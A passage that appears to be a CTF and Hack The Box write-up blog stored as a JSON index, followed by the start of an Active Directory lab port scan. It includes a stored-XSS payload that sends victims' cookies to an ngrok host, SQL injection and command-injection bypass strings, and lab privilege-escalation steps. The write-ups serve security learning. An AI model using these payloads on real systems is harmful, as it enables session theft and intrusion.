The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo 
\u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. 
so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool 
-PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . 
I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. 
The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. 
Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. 
Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. 
Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = 
f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. 
I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34; I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]} I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13 +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+ We can login to ssh as the user sau. 
The we read user.txt\nI uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\nREFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\nLooking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34; As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34; We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and 
then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . 
You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}]
\ No newline at end of file
+[{"content":"Walkthrough of Active Directory Lab Goad-Light. 
Check it out \u0026raquo; here\nPort Scan 192.168.0.150\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:27:08Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. 
| ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:kingslanding.sevenkingdoms.local | Issuer: commonName=SEVENKINGDOMS-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-07T09:42:05 | Not valid after: 2025-11-07T09:42:05 | MD5: b576:fc73:6d3c:c104:3036:8c1a:3a5b:d8a0 |_SHA-1: 40f7:b88f:b246:d390:dc4d:37a4:c597:c73a:4c21:2ffd |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. 3389/tcp open ssl/ms-wbt-server? 
| rdp-ntlm-info: | Target_Name: SEVENKINGDOMS | NetBIOS_Domain_Name: SEVENKINGDOMS | NetBIOS_Computer_Name: KINGSLANDING | DNS_Domain_Name: sevenkingdoms.local | DNS_Computer_Name: kingslanding.sevenkingdoms.local | Product_Version: 10.0.17763 |_ System_Time: 2024-11-07T16:28:09+00:00 |_ssl-date: 2024-11-07T16:28:14+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Issuer: commonName=kingslanding.sevenkingdoms.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-11-06T09:02:59 | Not valid after: 2025-05-08T09:02:59 | MD5: d9ec:f182:4515:44a8:0935:5d95:3c86:dd98 |_SHA-1: 00ad:2903:56a1:7c6a:b16c:bd2d:a7c0:c6fb:4edb:e2e9 Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | nbstat: NetBIOS name: KINGSLANDING, NetBIOS user: \u0026lt;unknown\u0026gt;, NetBIOS MAC: 08:00:27:7a:a2:fc (Oracle VirtualBox virtual NIC) | Names: | KINGSLANDING\u0026lt;00\u0026gt; Flags: \u0026lt;unique\u0026gt;\u0026lt;active\u0026gt; | SEVENKINGDOMS\u0026lt;00\u0026gt; Flags: \u0026lt;group\u0026gt;\u0026lt;active\u0026gt; | SEVENKINGDOMS\u0026lt;1c\u0026gt; Flags: \u0026lt;group\u0026gt;\u0026lt;active\u0026gt; |_ KINGSLANDING\u0026lt;20\u0026gt; Flags: \u0026lt;unique\u0026gt;\u0026lt;active\u0026gt; | smb2-time: | date: 2024-11-07T16:28:09 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: -1s, deviation: 0s, median: -1s 192.168.0.151\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 PORT STATE SERVICE VERSION 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-07 16:30:04Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: 
